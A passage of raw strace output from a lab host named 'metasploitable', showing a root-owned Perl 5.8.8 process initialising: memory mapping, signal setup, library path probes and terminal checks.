\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

7950  07:21:09.335358 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

7950  07:21:09.335375 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd0000

7950  07:21:09.335386 mmap2(0xb7dd9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dd9000

7950  07:21:09.335400 mmap2(0xb7ddb000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ddb000

7950  07:21:09.335413 close(1)          = 0

7950  07:21:09.335436 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dcf000

7950  07:21:09.335448 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dcf8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7950  07:21:09.335504 mprotect(0xb7f4b000, 4096, PROT_READ) = 0

7950  07:21:09.335558 munmap(0xb7f93000, 29913) = 0

7950  07:21:09.335572 set_tid_address(0xb7dcf908) = 7950

7950  07:21:09.335595 set_robust_list(0xb7dcf910, 0xc) = 0

7950  07:21:09.335605 futex(0xbfa466e0, 0x81 /* FUTEX_??? */, 1) = 0

7950  07:21:09.335619 rt_sigaction(SIGRTMIN, {0xb7f552c0, [], SA_SIGINFO}, NULL, 8) = 0

7950  07:21:09.335632 rt_sigaction(SIGRT_1, {0xb7f55340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

7950  07:21:09.335644 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

7950  07:21:09.335658 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

7950  07:21:09.335676 uname({sys="Linux", node="metasploitable", ...}) = 0

7950  07:21:09.335720 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

7950  07:21:09.335765 brk(0)            = 0x8153000

7950  07:21:09.335774 brk(0x8174000)    = 0x8174000

7950  07:21:09.335815 getuid32()        = 0

7950  07:21:09.335825 geteuid32()       = 0

7950  07:21:09.335834 getgid32()        = 0

7950  07:21:09.335842 getegid32()       = 0

7950  07:21:09.335880 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dae000

7950  07:21:09.335907 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

7950  07:21:09.335923 read(1, "\245#^\376", 4) = 4

7950  07:21:09.335937 close(1)          = 0

7950  07:21:09.335954 time(NULL)        = 1495624869

7950  07:21:09.335994 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfa463b0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336039 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfa463b0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336054 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfa463b0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336083 stat64("/usr/local/lib/perl/5.8.7", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336099 stat64("/usr/local/share/perl/5.8.7", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336111 stat64("/usr/local/lib/perl/5.8.6", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336123 stat64("/usr/local/share/perl/5.8.6", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336134 stat64("/usr/local/lib/perl/5.8.4", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336146 stat64("/usr/local/share/perl/5.8.4", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336157 stat64("/usr/local/lib/perl/5.8.3", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336169 stat64("/usr/local/share/perl/5.8.3", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336180 stat64("/usr/local/lib/perl/5.8.2", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336191 stat64("/usr/local/share/perl/5.8.2", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336203 stat64("/usr/local/lib/perl/5.8.1", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336214 stat64("/usr/local/share/perl/5.8.1", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336226 stat64("/usr/local/lib/perl/5.8.0", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336237 stat64("/usr/local/share/perl/5.8.0", 0xbfa464f0) = -1 ENOENT (No such file or directory)

7950  07:21:09.336259 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa461e8) = -1 ENOTTY (Inappropriate ioctl for device)

7950  07:21:09.336272 _llseek(0, 0, [0], SEEK_CUR) = 0

7950  07:21:09.336284 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa461e8) = -1 EBADF (Bad file descriptor)

7950  07:21:09.336294 _llseek(1, 0, 0xbfa46230, SEEK_CUR) = -1 EBADF (Bad file descriptor)

